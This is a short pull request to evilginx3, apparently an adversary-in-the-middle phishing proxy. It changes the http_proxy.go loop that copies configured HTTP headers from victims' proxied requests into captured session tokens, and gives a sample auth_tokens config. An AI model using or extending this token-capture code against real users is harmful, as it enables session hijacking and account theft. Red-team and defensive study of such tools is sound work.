### PR TITLE
fix: fixed the matching logic for `HttpAuthToken`

### DIFF
--- a/evilginx3/core/http_proxy.go
+++ b/evilginx3/core/http_proxy.go
@@ -1102,7 +1102,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 
 					// capture http header tokens
 					for k, v := range pl.httpAuthTokens {
-						if _, ok := s.HttpTokens[k]; !ok {
+						if req_hostname == v.domain && v.path.MatchString(resp.Request.URL.Path) {
 							hv := resp.Request.Header.Get(v.header)
 							if hv != "" {
 								s.HttpTokens[k] = hv


### PR DESCRIPTION
the path and domain filed in HttpAuthToken  is not used
```
auth_tokens:
  - domain: 'abc.example.com'
    path: 'apppath' // <-----not used
    name: "test001"
    type: 'http'
    header: "Referer"
```

this PR fixes this issue